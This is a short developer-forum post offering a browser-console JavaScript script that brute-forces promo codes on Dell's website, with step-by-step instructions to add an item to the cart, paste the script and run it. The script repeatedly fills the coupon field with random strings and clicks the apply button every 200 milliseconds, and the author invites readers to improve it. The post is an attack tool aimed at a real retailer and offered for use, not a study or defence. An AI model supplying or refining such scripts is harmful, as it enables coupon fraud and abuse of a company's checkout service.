DEV Community

pawan deore
pawan deore

Posted on

Script to brute force Dell Promo code [in development]

go to https://www.dell.com

add something in the cart

open console paste the below script

press enter

let inp = document.querySelector("#appendedCouponInputButton")
let btn = document.querySelector("#applyCouponButton")
setInterval(function(){
let str = Math.round(Math.random()*99999999999998765876).toString(36);
    inp.value=str;
    btn.click();
},200)
Enter fullscreen mode Exit fullscreen mode

i know that we required to build much more our str i.e coupon is not strong. i will update on this script on every weekend, till then you can modify script.

Oldest comments (0)